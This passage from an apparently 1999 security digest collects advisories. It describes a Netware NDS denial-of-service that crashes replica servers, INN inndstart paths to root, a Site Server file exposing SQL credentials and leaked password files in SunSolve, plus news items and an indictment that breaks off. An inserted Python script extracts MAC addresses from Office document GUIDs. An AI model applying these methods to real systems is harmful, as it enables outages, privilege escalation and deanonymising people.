However, a malicious user with proper access can force the memory depletion and potentially crash a server that has a replica of the NDS database. This can lead to multiple near-simultaneous server crashes. Of course anyone with administrative access can do this, but they could obviously do other acts that could be just as destructive, if not more so. What is needed is the ability to create a large number of NDS updates very quickly. For example, if a user has the ability to create a container and add objects to it, then that user has enough authority to potentially cause problems to TTS.
Creating a container, dropping a few hundred objects into the container via drag-and-drop and then deleting the container should suffice. If the server lacks a large amount of free memory, the server will quite possibly abend. In other cases, TTS is disabled, which is a form of Denial of Service. As the messages are sent across to other servers containing NDS replicas, they too may crash.

In our test environment we were able to crash two servers (Netware 4.1 and Netware 4.11) with the scenario of creating a container, adding a few hundred users, and then deleting the container.

Solution/Workaround
-------------------

NMRC has heard reports of as many as a dozen servers crashing within a couple of minutes of each other, so apply the latest Service Pack for Netware 4.x on all servers or upgrade to Netware 5.

Comments
--------

Novell has already been notified and they are obviously aware of the TTS limitations (refer to the May 1997 TID 2908153 at http://support.novell.com/cgi-bin/search/tidfinder.cgi?2908153 for an example). Per Novell the latest patches for Netware 4.x correct the problem, and Netware 5 does not have the problem at all.

Thanks to Michel Labelle for notifying NMRC about this problem.

_______________________________________________________________________________
See http://www.nmrc.org/news/ for more advisories.

Simple Nomad // thegnome@nmrc.org // ....no rest for the Wicca'd.... www.nmrc.org //

@HWA

04.0 InoculateIT for Windows NT 4.53 scans inbox but misses other inbound msgs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 12 May 1999 09:52:59 -0500
From: Bob Duffett
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: InoculateIT 4.53 Real-Time Exchange Scanner Flawed

Manufacturer: Computer Associates
Product: InoculateIT for Windows NT v4.53 Build 169, Agent for Microsoft Exchange

This product has a major defect.
We have it running on our Exchange Server with 1,300 mailboxes yet viruses keep spreading directly from email. I did some investigating tonight and found the problem. It is ONLY scanning the Inbox folder tree. This would sound simply like a poor design but it is MUCH worse. The Inbox Rules Wizard can store the user's rules on the Exchange Server which will move a message to a specific folder without the message ever being placed in a user's inbox. This causes it to completely bypass the InoculateIT Real-Time Scanner. My CA rep confirmed the problem with CA support who had no work-around available at this time.

Bob
University of Alabama at Birmingham
Cancer Center Technical Services Facility (CCTSF)
mailto:Bob.Duffett@ccc.uab.edu

@HWA

04.1 CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sat, 8 May 1999 14:58:08 +1000
From: Glenn Corbett
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Insecure Behaviour in Inoculan Client

Russ,

A problem has been discovered with the InocuLAN client on Windows NT workstations. If an account lockout policy is present on a Windows NT domain, large numbers of repeating account lockouts can occur.

Description:
Incorrect password events (event id 529) are being logged from workstations when running applications from UNC paths. The username that has logged the incorrect password is different to that of the logged on user.

Configuration:
Windows NT workstation SP3 or SP4, with InocuLAN V4.0(373) or InocuLAN V4.0(375)

To reproduce the problem:

1. Install InocuLAN V4.0(373) or V4.0(375) onto an NT workstation with SP3 or SP4 (SP5 not tested yet)

2.
Configure InocuLAN as described below:

   Options:
      Direction - Incoming and Outgoing files
      Action upon Virus detection - Cure File
      Cure Action for Macro Viruses - Remove Infected Macros
      Copy File before Cure
      Rename File when Cure Fails
      Rename Extension - AVB
      Move Directory - C:\Inoculan\VIRUS

   Protected Areas:
      Protect Floppy Drives
      Protect Network Drives
      Protect CD-ROM Drives

   Scan Type - Secure Scan

3. Reboot the workstation

4. Log into WorkstationA as Domain UserA, Logout Domain UserA

5. From another workstation change the password of Domain UserA

6. Log into WorkstationA as Domain UserB.

7. From WorkstationA run an application from a remote share on WorkstationX where Logon and Logoff, Success/Failure, are being audited. Run an application from the cmd window using a UNC path with no other connections to the WorkstationX. E.g. \\WorkstationX\shareX\notepad

8. The application will take several seconds to run and there will be a failure security event (529) for UserA from Workstation A.

From server manager remotely stop the Cheyenne InocuLAN Anti-Virus Server on Workstation A and repeat step 7. You will see that the application will start immediately and no errors will be recorded in the security event log.

The above problem also causes problems when running logon scripts. If an application is called from the logon script and that application does not exist on the local workstation, the version in the logon share will be run. As soon as the application in the logon script is called there is an event 529 error recorded on the logon server security event log.

Even if subsequent different users log into Workstation A, these problems will continue until the workstation is rebooted.

This behaviour can also be seen if in Step 4, a local userA logs on. The subsequent error 529's have the local userA account in the security event.
It appears as though InocuLAN is storing the user credentials for the first logged on user and using them to scan network drives for viruses even when a different user subsequently logs on, until workstation reboot. It is not yet apparent if this username / password is being stored in the registry / temporary file or memory, and therefore open to exploit.

We do not see this problem with InocuLAN V4.0 (4.0 Service Pack 1).

CA have been notified earlier this week, no response as yet.

Thanks

Glenn Corbett
CRISP Project Server / Workstation Team Leader
Compaq Computer Corp, Australia.
Glenn.Corbett@compaq.com (Work)
Glenn.Corbett@bigpond.com (Private)

--------------------------------------------------------------------------------

Date: Fri, 14 May 1999 14:49:17 -0400
From: ARCNT
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: FW: NTBUGTRAQ response - URGENT

The issue reported to NTBUGTRAQ regarding InocuLAN v4.0 build 373 and 375 implies that username/password information is stored "somewhere" on the client side and as such could potentially be exploited. That assertion is inaccurate, the username/password credential combination is NOT stored on the client side by Inoculan, (which is why the efforts to locate these credentials in shared memory, in a file or in the registry have been unsuccessful).

Clearly, in order for the InocuLAN real-time scanner to access files on a remote server, the software must have valid security contexts in place to permit the requisite access to the file systems and files. The techniques utilized by Inoculan (using low level, but fully documented and supported standard vendor API's) do NOT require that traditional user credentials (user account/ password) be presented in order to gain the necessary access. Rather, Inoculan is able to gain the required access in a completely secure manner without prompting for username and password information.
In addition, it is important to point out that NO attempt to retrieve credential data is done without the user's explicit advance knowledge and consent. Computation/generation of the requisite credential information is done at Inoculan driver initialization time, and can be easily refreshed by simply rebooting the machine (which of course will in turn result in Inoculan initialization routines being invoked as part of system restart).

The particular behaviour observed and reported can be attributed to the fact that AFTER Inoculan initialization was completed, the user access credentials for the user in question were modified, rendering the originally computed credential that Inoculan would otherwise utilize, invalid.

An enhancement is being developed presently to provide a configuration setting that will instruct the Inoculan real-time scanner to recompute credentials automatically thus eliminating the need to reboot the client machine. This enhancement will be available by 17:00 Eastern US time, May 21, 1999, and can be downloaded from the standard Computer Associates support web sites, (http://support.cai.com).

We appreciate the efforts involved in bringing this issue to our attention and look forward to being able to provide you continued responsive service in the future !

InocuLAN Technical Support

@HWA

05.0 [ISN] Everywhere your MAC address shows up
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 21:55:22 -0600 (MDT)
From: cult hero
To: InfoSec News
Subject: [ISN] Everywhere your MAC address shows up

Forwarded From:

MICROSOFT'S HEAVY HAND IN THE COOKIE JAR
A special report from YEOW - Barry Simon.

See the Woody's Office Watch discussion and details on the Office 97 privacy problem. Issues 4.11 and 4.12

Because of the important Internet Explorer 5 coverage some regular WWW features have been held over to the next issue.
We reported earlier on the brouhaha over the inclusion of hardware IDs in the Pentium III chip and privacy advocates' concerns about it. Turns out many of us already have hardware IDs on our systems since all Ethernet cards have a MAC (stands for 'Media Access Control', whatever that means!), a six byte ID number that networks need to be sure to properly direct network packets. Of course, the Pentium III IDs are more serious since many home systems don't (yet) have network cards and the biggest privacy concerns are in the consumer space.

Due to wonderful sleuthing by Richard Smith of PharLap (who earlier located the April Fool's Bug discussed in WWW issue 2.2), the world has discovered a number of places that Microsoft has been using these MACs - in Windows 98 IDs, in Office 97 documents and in the microsoft.com cookies. And privacy concerns result from all these uses.

To understand the issues, try a few experiments. First, you'll need your MAC assuming you have an Ethernet adapter. With Windows 9x, run the program winipcfg from the Run box. It should load with a dropdown that says 'PPP Adapter'. Change the dropdown to the name of your hardware adapter. The Adapter Address field will say something like 00-70-06-9A-8E-43. That's your MAC. Each byte is presented as two hex digits (0 through 9 or A-F) for a 12 character ASCII string which is what Microsoft uses. With Windows NT, run instead winmsd, go to the Network tab and pick Transports and you'll get the MAC.

For the next experiment, you'll need to look at a Word 97 document in text mode. You can't do this with Word. If you have Quick View Plus (plain Quick View won't do), open a Word doc in QVP, go to the View menu and pick View as Text. Or make a small Word doc, save it and rename it to a .txt extension and open it in Notepad. Now search for the string PID. You should find _PID_GUID and shortly afterwards, a long hex string inside braces such as {F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}.
Those 12 hex digits at the end will be your MAC. Yup, every Word doc, every Excel spreadsheet and every Power Point presentation is branded with an identifier showing the PC it came from. If your boss has a Word memo you sent her and a copy of the anonymous whistle blowing attachment you sent to the Feds, she could determine they were made on the same machine. (Of course, if you aren't careful, the document includes an author name and if any corrections were made, it may say who made the corrections. Within the next few days, Microsoft expects to post a white paper on all the 'metadata' embedded in Office documents).

To run the next experiments, you'll need Windows 98, so I'll tell you what happens so you can follow along in any event. In your Windows directory, you'll find a file called reginfo.txt. Open it in Notepad and look for a line called HWID; it ends with your MAC. This file is created when you install Windows and is transmitted to Microsoft when you register. And here's the clincher: even if you check the box not to send hardware information, this data is sent. And it's even worse - the data collection code is in an ActiveX control that can be used by any Internet site out there. Pharlap has a demo to illustrate this: go there and it displays your MAC on screen. Any site knowing of this control could track MACs of all Windows 98 visitors to their sites. There is also a demo and discussion at Windows Magazine. By the way, this ActiveX control is also in the Windows 2000 beta so if Microsoft hadn't been found out, NT users would have been hit next.

Next, go to your cookies directory and open the text file whose name ends with microsoft.txt (it probably has a username@ in front where username is your login name). In it you'll find a string called GUID that includes your MAC (GUID, by the way, is short for Global Unique Identifier). This cookie is sent to www.microsoft.com every time you visit that site.
You may have realized they were making a cookie when you registered at their site but I bet you didn't realize they were adding hardware information without your permission. (Actually the Win98 Registration Wizard made the cookie before you went to the Microsoft site.)

You might want to search your Registry for your MAC as a string. I found mine numerous times - two in suspicious places vis-a-vis Microsoft. It's part of a key for Media Player called Client ID (is this passed on to the Media Player servers?) and as part of a key HKCU\Identities that seems to be connected with Outlook Express 5.0.

There is certainly plenty here for the paranoid. Microsoft is collecting and storing in its databases unique hardware information. That information brands your documents, and is always sent on when you access Microsoft's site. One has to consider the possibility that Microsoft is keeping some master database tracking all sorts of interactions based on your MAC. And one has to allow the possibility that the MAC will be encoded in the information that is sent by the Office Registration Wizard in Office 2000.

Microsoft has reacted vigorously to the developments in this story. They have two customer letters (here and here) on their site in which they promise to remove the hardware ID part of the registration wizard in a Win98 upgrade. They also promise to delete 'any hardware ID information that may have been inadvertently gathered without the customer having chosen to provide Microsoft with this information.' Tools have already been posted to remove branding from Office applications and from already-created docs and there is a promise that branding will be removed from the final version of Office 2000.

Beyond these actions, there has been a full court spin operation. Some MS representatives have (unwisely in my opinion) attempted to minimize the issue.
There have been claims that the doc branding was a part of a feature, never implemented, intended solely to help network administrators. There has been harping on the fact that the MAC only identifies a machine but not an individual - true but not of much comfort in many cases. We've been told that Windows 98 sending a HWID even if you said not to send hardware information was a bug, not a feature - an inadvertent programming error. There's been no new statement about the use of MACs in cookies which I find most disturbing.

We've been told by Microsoft representatives that the Office 2000 Registration Wizard doesn't collect MACs or anything like a MAC. Indeed, they claim that while the Office CD serial number can be reconstructed from the 16 byte code sent by the wizard, the hardware info does not allow reconstruction. In particular, if different CDs were used on the same machine, they'd be unable to tell that the codes came from the same machine.

_____

The problem with the Microsoft position is that the company has so little credibility and there is too much of a pattern here. We pride ourselves on taking a middle road on Microsoft at Woody's newsletters. We don't hesitate to put their feet to the fire but, on the other hand, we don't take the position that Microsoft is the root of all evil and everything they say and do is two faced. That said, Woody's middle name isn't Polly and mine isn't Anna. Microsoft has amply demonstrated that it is company policy to, er, shade the truth when doing so serves a perceived business purpose. We see it in the leaked disinformation about Windows 2000 shipping this fall, we've seen it in their previous reactions to accusations and we saw it too often in the testimony at the DOJ trial. That means one has to take skeptically every statement that Microsoft has made about the MAC problem. I'm inclined to believe that branding of Office documents wasn't part of a plot to link together our entire lives in Microsoft's databases.
But I'm insulted that they try to bat their eyelashes and claim to us that the sending of the HWID even when you told them not to send hardware info was an inadvertent error. And I'm concerned that we have no way of knowing that they've kept their promise to remove hardware IDs from their internal databases. Indeed, my presumption is that they will not.

I worry that Microsoft is tucking all sorts of things into the holes they aren't discussing. While they have said they'll stop using HWID, they have also said they'll continue to use the MSID number which is created by the Windows 98 Registration wizard. And, guess what? As discovered by Peter Siering at the German publication C'T Magazine, the registration wizard also creates a Microsoft cookie that includes MSID. So even after the apologies and changes, it seems Microsoft will be quite capable of tracking us and linking online visits to registration information.

It's interesting about credibility. There was also an Intel slip reported recently that they claimed was inadvertent. Apparently some mobile Pentium II's shipped with hardware IDs even though these were only announced for Pentium III's. Intel's explanation is that they experimented with this feature in the manufacturing process for the mobile Pentium II but it was supposed to be disabled before shipping. One line inadvertently didn't do the disabling. Intel's credibility is such that I'm willing to accept their claim of inadvertence here.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
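An added example from this digest, not code from the YEOW/ISN article above or from Microsoft, that does by program what the article has you do by hand in Notepad: it scans the raw bytes of an Office 97 file for the _PID_GUID property, checks that the GUID has the time-based version-1 layout, and splits out the 48-bit node field, which is where the adapter's MAC ends up. It also reads the multicast bit that RFC 4122 requires a generator without a network card to set in a random node ID, so a random node is not mistaken for a real hardware address, and recovers the creation timestamp from the GUID's clock field. The document bytes and the 256-byte search window are constructed assumptions; the first GUID in the sample is the one quoted in the article, the second is a constructed version-4 (random) GUID that carries no MAC.

```python
"""Pull the MAC address out of the version-1 GUIDs that Office 97 wrote into
documents as _PID_GUID.  Added example for this digest; not code from the
YEOW article.  The document bytes below are constructed, not a real file."""
import re
import uuid
from datetime import datetime, timedelta, timezone

# A brace-delimited GUID as it appears in the raw file (8-4-4-4-12 hex groups).
GUID_RE = re.compile(
    rb"\{([0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-"
    rb"[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12})\}"
)
# RFC 4122 time-based GUIDs count 100 ns ticks from the Gregorian reform date.
GUID_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)


def decode_v1_guid(guid_text: str) -> dict:
    """Return the node (MAC), whether it looks like a real IEEE 802 address,
    and the creation time of a version-1 GUID.  Raises ValueError for any
    other variant or version, which has no node field to decode."""
    u = uuid.UUID(guid_text)  # accepts the {...} form as-is
    if u.variant != uuid.RFC_4122 or u.version != 1:
        raise ValueError(f"{guid_text}: not a version-1 GUID, carries no node field")
    octets = u.node.to_bytes(6, "big")
    # A generator with no network card must set the multicast bit (LSB of the
    # first octet) in a random node ID, so a clear bit means a real adapter MAC.
    hardware = (octets[0] & 0x01) == 0
    created = GUID_EPOCH + timedelta(microseconds=u.time // 10)
    return {
        "mac": "-".join(f"{b:02X}" for b in octets),
        "hardware_address": hardware,
        "created_utc": created,
    }


def extract_office_macs(blob: bytes, window: int = 256) -> list:
    """Find each _PID_GUID marker in the raw bytes of an Office 97 file and
    decode the GUID that follows it within `window` bytes (an assumption about
    how far apart the property name and its value sit)."""
    results = []
    marker = b"_PID_GUID"
    pos = blob.find(marker)
    while pos >= 0:
        start = pos + len(marker)
        m = GUID_RE.search(blob, start, start + window)
        if m:
            text = m.group(1).decode("ascii")
            try:
                info = decode_v1_guid(text)
            except ValueError:
                info = {"mac": None, "hardware_address": False, "created_utc": None}
            results.append({"guid": text, **info})
        pos = blob.find(marker, start)
    return results


# Constructed stand-in for a Word 97 file: the first property carries the GUID
# quoted in the article, the second a version-4 (random) GUID with no MAC in it.
SAMPLE_DOC = (
    b"\x00" * 16
    + b"_PID_GUID" + b"\x00" * 7
    + b"{F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}"
    + b"\x00" * 32
    + b"_PID_GUID\x00\x00"
    + b"{6BA7B810-9DAD-41D1-80B4-00C04FD430C8}"
)

if __name__ == "__main__":
    for entry in extract_office_macs(SAMPLE_DOC):
        print(entry)
```

On the sample, the first entry decodes to 00-60-08-9B-B2-DA with the multicast bit clear (a real adapter address) and a creation time in February 1999; the second, a version-4 GUID, reports no MAC. The variant and version checks matter in practice: feeding a random GUID into the node extraction would "find" twelve hex digits that are not a MAC at all.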
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

06.0 [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 16:27:38 -0600
From: Mark
To: BUGTRAQ@netspace.org
Subject: [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs

====================================================
Site Server's AdSamples Directory Reveals ID and PSW
Discovered by Andrey Kruchkov
====================================================

VERSIONS AFFECTED

* Tested on Microsoft Site Server 3.0 Commerce Edition

DESCRIPTION

Site Server allows the installation of an AdSamples directory, which serves to demonstrate the capabilities of the Ad Server component. If this directory is installed and left open to the public without limiting directory permissions, a user can obtain a site configuration file (SITE.CSC) that contains sensitive information pertaining to an SQL database. This information could contain a DSN, as well as a username and password used by the Ad Server to access the SQL server database.

COMMENTS

Andrey reported this problem to NTSECURITY.NET and has informed Microsoft of this issue. Andrey points out an easy way to eliminate this risk: Remove the "AdSamples" virtual directory from the DEFAULT root Web site, or change security permissions for this folder to sufficiently restrict access. If you must provide loose access to this virtual directory for some strange reason, then you should at least adjust the security permissions for the SITE.CSC file so that it's not available for viewing. Also keep in mind that there may be numerous other SITE.CSC files under your Site Server installation, all of which need to be secured.
For a URL that demonstrates the problem, please visit
http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm

This is probably a great time to remind people once again to NEVER install sample content on production servers and to NEVER use the built-in IIS DEFAULT Web site without first thoroughly investigating the implications of doing so.

Thanks,
Mark - http://www.ntsecurity.net

@HWA

07.0 inndstart vulnerability, possible root compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 11:24:06 -0400
From: Forrest J. Cavalier III
Reply-To: userkt-l@mibsoftware.com
To: BUGTRAQ@netspace.org
Subject: INN 2.0 and higher. Root compromise potential

Copyright 1999 Forrest J. Cavalier III, Mib Software
This information is provided by Mib Software, www.mibsoftware.com.
This notice can be distributed without limitation.

Summary:
--------

INN is open source NNTP (Usenet) server software from the Internet Software Consortium. http://www.isc.org/

In some cases, there is potential for the local news user, or any local user, to execute arbitrary code as root.

The two vulnerabilities reported below have already been discussed in the Usenet newsgroup news.software.nntp. Therefore, the vendor is being sent this notice now, and was not notified previously.

INN is communications software. Mib Software knows of no buffer overrun exploits of the affected versions of INN, but the possibility cannot be ruled out. This would be the only way a root compromise using a remote connection would be possible.

Background:
-----------

Since NNTP defines a privileged port (119), a SUID root wrapper, inndstart, binds to the port, and then is intended to drop root privileges, setting the UID to user news before exec() innd. In some cases, this behavior can be altered to gain privileges.
------------------------------------------------------------
Vulnerability 1 (pathrun should not be trusted information)
------------------------------------------------------------

Summary: It is possible for the news user to control the behavior of the inndstart program so that root privileges are not dropped, and execute arbitrary programs as root.

Versions affected: INN 2.0 and higher.
Versions not affected: INN 1.7.2 and lower.

Details: inndstart determines the target UID and GID from the UID and GID of a directory which is normally owned by user news, group news. The directory which is checked can be changed by editing the "pathrun" parameter in the inn.conf configuration file. By specifying a directory with appropriate ownership, inndstart can exec() running as any user, including root. During the course of normal operation, innd forks() and executes many child processes, and it is relatively simple to run arbitrary code from innd.

Solution: modify the source file innd/inndstart.c to use a hard coded pathrun, instead of the structure member innconf->pathrun.

Workaround: There is no workaround. The source must be modified.

------------------------------------------------------------------
Vulnerability 2 (inndstart should be protected, INNCONF environment variable should not be trusted.)
------------------------------------------------------------------

Versions affected: INN 2.x after July 9, 1998 (including INN 2.1 and higher.)
Versions not affected: INN 1.7.2 and lower.

Details: Normally, the SUID root program inndstart, should be in a directory accessible only by user news. In some installations, this program is accessible to all local users. On July 9, 1998 a source code change was introduced which obtains the path of the configuration file from the environment variable INNCONF.
In those installations with inndstart accessible to local users, a local user can set INNCONF in the environment and determine the behavior of inndstart so that arbitrary programs are executed. If the pathrun vulnerability above is fixed, these programs run as user news, if not fixed, they run as user root.

Solution: Install inndstart in a directory with 0700 permissions owned by user news.

-------------------------------------------------------------------
Forrest J. Cavalier III, Mib Software, INN customization and consulting
'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages.
http://www.mibsoftware.com/innsup.htm

@HWA

08.0 Sunsolve.Database leaks crucial info about itself and its users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Tue, 11 May 1999 19:22:59 +0100
From: "Robson, Ken"
To: BUGTRAQ@netspace.org
Subject: Sun Microsystems Leaks extensive Amounts of Information About Itself & Its Customers Through Its Sunsolve Database...

Hi Folks,

I have just been scouring Sun's Bug Reports for some information and I discovered that you can easily trawl for useful information about both Sun and its clients. Information exposed includes:-

* Copies of /etc/passwd (i.e. user names)
* Copies of /etc/shadow (i.e. encrypted passwords)
* Configuration of network services (i.e. inetd.conf)

It is trivial to put together searches that glean this for some of their customers. Whilst the contract services restrictions are in place for accessing these accounts, logins must be in wide circulation. I know 3 or 4 accounts from various past employers myself.

When logging a support call I do not often consider what might happen to the call notes. I am sure that Sun are not the only company doing this and this is not aimed at Sun in particular, they are just an example.
Serious consideration should be given to what information you are prepared to pass to those who support you - do you trust the rest of their customers (at best) or the entire internet (at worst).

Anyway not earth shattering but food for thought.

Regards,

Ken.

PS - Please do not interpret the domain that this mail comes from as any indication that I work for the European Bank for Reconstruction & Development. I in fact contract to Hewlett Packard and am simply based at the bank - all the opinions expressed above are my own and have nothing to do with either of these organisations.

-----------------------------------------------------------------------------

Date: Wed, 12 May 1999 09:56:00 -0700
From: Alan Coopersmith
To: BUGTRAQ@netspace.org
Subject: Re: Sun Microsystems Leaks extensive Amounts of Information About Itself & Its Customers Through Its Sunsolve Database

> When logging a support call I do not often consider what might happen to the
> call notes. I am sure that Sun are not the only company doing this and this
> is not aimed at Sun in particular, they are just an example. Serious
> consideration should be given to what information you are prepared to pass
> to those who support you - do you trust the rest of their customers (at
> best) or the entire internet (at worst).

The actual service order notes are not available to customers through SunSolve - but parts of bug reports that may be generated by them are. At least a few years ago when I worked in SunService they reminded us not to put customer information in the public part of bug reports, but there was no review system to make sure we didn't screw up.

If you want to protect yourself, make sure that if your call results in a bug report you go to SunSolve and review the public copy to make sure there's nothing in there you wouldn't want others to see and if there is, call up your service rep and make them move it to the sun-internal-access-only section of the bug report.
Disclaimer: I no longer work in Tech Support at Sun and do not and cannot speak for SunService or whatever they're called after the latest "realignment of the Sun planets".

--
________________________________________________________________________
Alan Coopersmith                        alanc@godzilla.EECS.Berkeley.EDU
Univ. of California at Berkeley         http://soar.Berkeley.EDU/~alanc/
aka: alanc@{CSUA,OCF,CS,BMRC,EECS,ucsee.eecs,cory.eecs}.Berkeley.EDU

@HWA

09.0 [ISN] Asia is wide open to virus, hacker attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: William Knowles

http://www.feer.com/Restricted/99may_20/tech.html
(Feer.com) [5.20.99]

How personal are personal computers? At the rate Asian companies and individuals are exposing their computers to on-line infection and intrusion, they may as well drop the "P" from PC. The information highways are proving very public, but many Asians are travelling naked and defenceless.

Computer viruses are the region's biggest problem. Two major virus attacks in March and April crippled hundreds of thousands of Asia's computers. Then in late April, the Singapore government was caught snooping into PCs without seeking permission from their owners. The incidents have highlighted the need to protect PCs from viruses and unwanted intruders--protection that's sorely lacking in the region.

While multinational companies now keep a constant vigil on the security of their computer networks, many other companies and individuals have left themselves vulnerable. To protect against viruses, they need to install and diligently update antivirus software, which costs an average of $50 per program for personal use. Large companies have for many years installed virtual "firewalls" that combine antivirus, antihacking and other protective software, but antihacking and personal-data security programs are only just becoming commercially available to individual PC users.

The latest virus hit more than 650,000 computers in Asia.
Named Chernobyl, it remained dormant until April 26, the 13th anniversary of the Chernobyl nuclear-plant disaster in Ukraine. On that day, the virus disabled computers, destroyed programs and erased large amounts of stored information. Xinhua news agency reported that 360,000 PCs were affected in China. The virus's Taiwanese creator, 24-year-old Chen Ing-hau, said he had wanted to cause mayhem on the mainland. Chen was arrested but released without charge due to a lack of plaintiffs in Taiwan, where no infections were reported.

"Chernobyl's been known about and treatable for over a year and still people were caught out," says Daniel Schneersohn, Hong Kong-based regional director for Symantec, an American maker of antivirus software. He says many customers had such software installed, but had simply not activated it. Half of the damaged PCs in China, for instance, had protective software that was not turned on. Although most corporate PCs shipped to South Korea since 1997 contain antivirus software, Chernobyl infected an estimated 250,000 PCs in that country. Many companies allow their employees to turn off antivirus software, which can slow down the computer while it monitors infections.

Many users had failed to keep installed software up-to-date. "It's not enough to buy antivirus software and install it or even activate it," says Schneersohn. "You've got to update the software--the antivirus companies update the virus threat lists every week."

Eric Sheridan, director of Asia business development for U.S. computer-systems company Corporate Software & Technology, says most of his customers, almost all multinationals, escaped Chernobyl unscathed. "Our customers all have ongoing contracts for security and virus protection, or they have good in-house teams at work," he explains. Most at risk are individual PC users and companies with less sophisticated information-technology departments, Sheridan says, especially as they make increasing use of the Internet. "Once you have a few offices up and on-line you have to take outside threats like viruses and hacking seriously."

Schneersohn agrees that while multinational firms are taking these threats seriously, the rest of the Asia-Pacific isn't. "Even some big listed companies in Hong Kong don't use antivirus protection," he says. Smaller businesses in particular have turned to pirated antivirus programs during the economic crisis to keep costs down. But they lose the advantages of software support and advice, says Schneersohn. "It's software use at its lowest level and that's why the highest level of infections are in small businesses and homes" where pirated programs are most prevalent. Still, even pirated-software users could have protected themselves by downloading updates of antivirus programs from the manufacturer's Web site. For now, most software companies don't bother to trace pirates who download updates, says Schneersohn--although Symantec's next generation of antivirus software will update only registered users.

Just as the dust settled from the Chernobyl attack, Internet users in Singapore were faced with a more organized affront to their computer privacy. SingNet, an Internet service provider, acknowledged that it asked the Home Affairs Ministry's IT security unit to scan its customers' PCs for viruses without their consent. SingNet is owned by Singapore Telecom, which is in turn 80%-owned by the government. SingNet's actions only came to light because a student, who had downloaded antihacker software from the Internet onto her PC, traced the scan back to the ministry. SingNet's home page on the Web apologizes for the intrusion--"We should have informed you first," it says--and invites visitors to voluntarily submit to the virus search instead. The company says the scanning did not "enter" any PCs nor unveil any personal data.
Also, SingNet claims it found 900 PCs infected with "trojan horse" viruses that allow hackers to enter computers via the Internet and take almost complete control. The SingNet action and the discovery of the "trojan horse" viruses highlight the ease with which PCs can be snooped on while on-line. "If breaking in is so easy, some less scrupulous companies may well start thinking that it might be worth throwing a few bucks at some kid to look into their competitors' files," says Schneersohn.

For personal and small-business users, encryption is one option for protecting confidential data from hackers. But use of encryption is either illegal or legally untested in many Asian countries. A second option is to remove confidential data to a separate disk drive and access it only when the user is off-line. To protect stored data while the user is on-line, demand will probably grow among personal and small-business PC owners for simpler versions of the "firewalls" that large companies use to protect their computer networks from intrusion. Schneersohn says antivirus software makers are already looking into the market. "Many people want to block access to personal files to all third parties--you could call it a personal firewall. They simply want to regain control of what's happening on their computers."

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

10.0 More on Zyklon's legal troubles
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Zyklon Busted
contributed by Space Rogue

HNN first reported this news early Friday morning and has now learned more details. Zyklon (Eric Burns) has now been charged with three counts of unlawful computer intrusion. The counts are believed to be for alleged attacks on the USIA (US Information Agency) web site, which was hosted by Electric Press in Herndon, Va. Other companies allegedly attacked were LaserNet in Fairfax, Va., and Issue Dynamics Inc., which also has machines in Va. The total damage estimates are listed as $15,000. (Which seems a little low compared to other similar cases.) It is believed that the Secret Service will also question Zyklon in connection with any involvement he may or may not have had in the recent whitehouse.gov crack.

Copy of the Indictment
http://www.hackernews.com/orig/zyklon.html

MSNBC
http://www.msnbc.com/news/269584.asp

ABC News
http://abcnews.go.com/sections/tech/DailyNews/whitehousehacker990515.html

                 IN THE UNITED STATES DISTRICT COURT FOR THE
                        EASTERN DISTRICT OF VIRGINIA

                             Alexandria Division

UNITED STATES OF AMERICA        )
                                )
          v.                    )    Criminal No.
                                )
ERIC BURNS                      )    Counts 1-3: Computer Intrusion
also known as "Zyklon"          )    (18 U.S.C. § 1030(a)(5))
                                )
          Defendant.            )

                                 INDICTMENT

                   May 1999 Term - At Alexandria, Virginia

                                  COUNT 1

THE GRAND JURY CHARGES THAT:

From on or about August 25, 1998, through on or about January 22, 1998, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein, knowingly and intentionally caused transmissions from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Electric Press, Herndon, Virginia, which was a protected computer used by and for the United States Information Agency, an agency of the United States Government, and the conduct affected the use of the computer by and for the government and caused loss aggregating at least $5,000 to at least one individual between August 25, 1998 and March 1, 1999.

(In violation of Title 18, United States Code, Section 1030(a)(5)(A).)
                                  COUNT 2

THE GRAND JURY CHARGES THAT:

